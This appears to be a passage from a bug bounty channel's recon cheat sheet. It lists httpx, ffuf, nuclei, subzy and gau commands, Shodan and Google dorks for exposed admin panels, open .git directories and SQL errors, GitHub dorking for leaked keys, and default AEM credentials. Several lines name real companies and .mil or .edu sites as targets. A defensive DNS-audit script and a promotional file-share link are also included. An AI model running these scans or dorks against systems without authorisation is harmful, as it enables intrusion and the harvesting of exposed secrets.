- cat all-subs.txt | httpx -o live-subs.txt
- cat live-subs.txt | dirsearch --stdin
- also ffuf :-
ffuf -u https://www.workramp.com/FUZZ -w wordlist.txt -mc 200,403,301,302 -c true -v -o output.txt
----------------------------------------------------------------------------------------------
## Subdomain Takeover :-
1- Recon (live-subs.txt)
2- Testing :-
1- Nuclei :-
- nuclei -t /root/nuclei-templates/takeovers/ -l live-subs.txt
2- Subzy :- https://github.com/LukaSikic/subzy
- subzy run --targets live-subs.txt
- subzy run --target test.google.com
- subzy run --target test.google.com,https://test.yahoo.com
______________________
## virtual Host scanner :-
- git clone https://github.com/jobertabma/virtual-host-discovery.git
- ruby scan.rb --ip=151.101.194.133 --host=cisco.com
______________________
## JS Hunting :-
1- echo target.com | gau | grep ".js" | httpx -content-type | grep 'application/javascript' | awk '{print $1}' | nuclei -t /root/nuclei-templates/exposures/ -silent > secrets.txt
2- echo uber.com | gau | grep '\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'
3- JSS-Scanner :-
- echo "invisionapp.com" | waybackurls | grep -iE '\.js'|grep -ivE '\.json'|sort -u > j.txt
- python3 JSScanner.py
______________________
## Shodan Dorking :-
- ssl.cert.subject.CN:"gevme.com*" 200
- ssl.cert.subject.CN:"*.target.com" "230 login successful" port:"21"
- ssl.cert.subject.CN:"*.target.com"+200 http.title:"Admin"
- Set-Cookie:"mongo-express=" "200 OK"
- ssl:"invisionapp.com" http.title:"index of / "
- ssl:"arubanetworks.com" 200 http.title:"dashboard"
- net:192.168.43/24, 192.168.40/24
- AEM Login panel :- git clone https://github.com/0ang3el/aem-hacker.git
User:anonymous
Pass:anonymous
## Collect all interesting IPs from Shodan and save them in ips.txt
- cat ips.txt | httpx > live-ips.txt
- cat live_ips.txt | dirsearch --stdin
______________________
## Google dorking :-
- site:*.gapinc.com inurl:"*admin | login" | inurl:.php | .asp
- intext:"index of /.git"
- site:*.*.edu intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()"
- site:*.mil link:www.facebook.com | link:www.instagram.com | link:www.twitter.com | link:www.youtube.com | link:www.telegram.com |
link:www.hackerone.com | link:www.slack.com | link:www.github.com
- inurl:/geoserver/web/ (intext:2.21.4 | intext:2.22.2)
- inurl:/geoserver/ows?service=wfs
______________________
## Github Dorking on live-subs.txt :-
- git-Grabber :-
- python3 gitGraber.py -k wordlists/keywords.txt -q "yahoo" -s
- python3 gitGraber.py -k wordlists/keywords.txt -q \"yahoo.com\" -s
- python3 gitGraber.py -k keywordsfile.txt -q \"yahoo.com\" -s -w mywordlist.txt
- GitHound
______________________
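The takeover section above runs nuclei and subzy against live-subs.txt from the outside. The inventory-side version of the same check is an audit of your own zone: every CNAME whose target no longer resolves is a record to delete before someone else claims the name. Added example, not code from this channel or from subzy; the zone records, the resolver answers and the third-party suffixes are all constructed for the demo:

```python
# Constructed zone export (assumption) for the hypothetical domain example.com.
ZONE = [
    ("www.example.com",      "CNAME", "example.com.cdn-provider.example."),
    ("old-blog.example.com", "CNAME", "old-blog.example.ghost-host.example."),
    ("api.example.com",      "A",     "203.0.113.10"),
    ("shop.example.com",     "CNAME", "shop-example.commerce-saas.example."),
]
# Constructed view of what public DNS currently answers for each CNAME target.
# old-blog.example.ghost-host.example. is absent on purpose: NXDOMAIN, i.e. dangling.
ANSWERS = {
    "example.com.cdn-provider.example.":    ["198.51.100.7"],
    "shop-example.commerce-saas.example.":  ["203.0.113.55"],
}
# Hosting services where an unclaimed name can be registered by anyone (assumption).
THIRD_PARTY_SUFFIXES = ("cdn-provider.example.", "commerce-saas.example.", "ghost-host.example.")


def fake_resolve(name):
    """Stand-in resolver: returns addresses or raises LookupError on NXDOMAIN."""
    if name in ANSWERS:
        return ANSWERS[name]
    raise LookupError("NXDOMAIN " + name)


def audit_cnames(zone, resolve):
    """One finding per CNAME: whether its target still resolves and whether it points
    at a third-party service where an unclaimed name could be registered by a stranger."""
    findings = []
    for name, rtype, target in zone:
        if rtype != "CNAME":
            continue
        third_party = target.endswith(THIRD_PARTY_SUFFIXES)
        try:
            addrs = resolve(target)
            status = "resolves" if addrs else "dangling"
        except LookupError:
            status = "dangling"
        findings.append({"name": name, "target": target,
                         "status": status, "third_party": third_party})
    return findings


def records_to_remove(findings):
    """Dangling CNAMEs: delete these, or re-claim the target, before someone else does."""
    return [f["name"] for f in findings if f["status"] == "dangling"]


if __name__ == "__main__":
    for f in audit_cnames(ZONE, fake_resolve):
        print(f["name"], "->", f["target"], f["status"], "(third party)" if f["third_party"] else "")
```

With a real resolver (for example `dns.resolver` from dnspython, mapping NXDOMAIN to `LookupError`) the same function runs against a live zone export; a CNAME that still resolves but points at a third-party service is worth a second look too, since some services answer for unclaimed names, which is the case the fingerprint-based tools above detect.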
✅ 500 TB Tutorials + Books + Courses + Trainings + Workshops + Educational Resources ✅
🟡Data science
🟡Python
🟡Artificial Intelligence
🟡AWS Certified
🟡Cloud
🟡BIG DATA
🟡Data Analytics
🟡BI
🟡Google Cloud Platform
🟡IT Training
🟡MBA
🟡Machine Learning
🟡Deep Learning
🟡Ethical Hacking
🟡SPSS
🟡Statistics
🟡Data Base
🟡Learning language resources ( English🌍 , French🇫🇷 , German🇩🇪 )
🔗https://drive.google.com/drive/mobile/folders/1CgN7DE3pNRNh_4BA_zrrMLqWz6KquwuD
📨 Join https://t.me/bugbounty_tech